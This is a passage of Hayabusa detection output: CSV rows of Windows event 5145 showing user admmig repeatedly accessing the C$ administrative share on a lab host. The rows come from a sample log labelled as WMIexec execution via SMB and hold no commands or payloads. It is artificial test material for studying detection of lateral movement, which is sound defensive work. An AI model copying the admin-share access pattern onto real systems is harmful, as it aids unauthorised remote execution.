2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 